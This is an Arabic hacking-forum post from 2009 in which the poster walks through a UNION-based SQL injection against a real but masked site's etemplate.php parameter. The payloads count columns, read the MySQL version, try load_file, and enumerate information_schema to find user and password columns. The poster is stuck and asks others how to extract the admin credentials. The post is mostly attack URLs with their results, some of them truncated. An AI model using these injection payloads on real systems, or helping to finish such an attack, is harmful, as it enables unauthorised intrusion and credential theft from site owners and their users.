كيف الشباب
سؤالي اكيد بسيط بالنسبه الكن
رح اتركن مع الخطوات
http://********/etemplate.php?id=58 موقع مصاب
.................................................. .............................................
عدد الاعمده http://*******/etemplate.php?id=58+order+by+13
.................................................. ................................................
نفذت هاد الامر
http://******/etemplate.php?id=58+an...lect+1,2,3,4,5 ,6,7,8,9,10,11,12,13
ظهر العامود الخامس مصاب
.................................................. .................................................
انتقلت للامر لمعرفه اصدار القاعده
http://******/etemplate.php?id=58+an...lect+1,2,3,4,v ersion(),6,7,8,9,10,11,12,13
ظهر الاصدار 5.0.45-community-nt
.................................................. .................................................. ..........................
انتقلت للامر لفحص السيرفر load_file('/')
http://****/etemplate.php?id=58+and+...select+1,2,3,4, load_file('/'),6,7,8,9,10,11,12,13
ظهر خطأ ؟؟؟؟
طنشت الخطة هي
.................................................. .................................................. .......
انتقلت للامر
http://******/etemplate.php?id=58+an...lect+1,2,3,4,c oncat(table_name,0x3a,column_name,0x3a,table_schem a),6,7,8,9,10,11,12,13+from+information_schema.col umns
ظهر عواميد اليوزر و الباس
CHARACTER_SETS:CHARACTER_SET_NAME:information_sche ma
.................................................. .................................................
انتقلت للامر التالي لاجيب عامود الباسورد
where+column_name+LIKE+CHAR(37, 112, 97, 115, 37)
طبعا كلمة pas مشفره تشفير mysql char
بعد تنفيذ الامر يظهر الخطأأ
لهون وصلت وم عاد فيي اتحرك خطوه
والحل ي شباب
شو المشكله وكيف فيني كمل
حاسس حالي صرت قريب من اسم الادمن والباسوورد
:00001793[1]: > مبسوط
الحل ي شباب
بر[ب]
09-14-2009, 03:41 PM
ثغرة حقن وجعت رااسي
المواضيع المتشابهه
العرض الشجري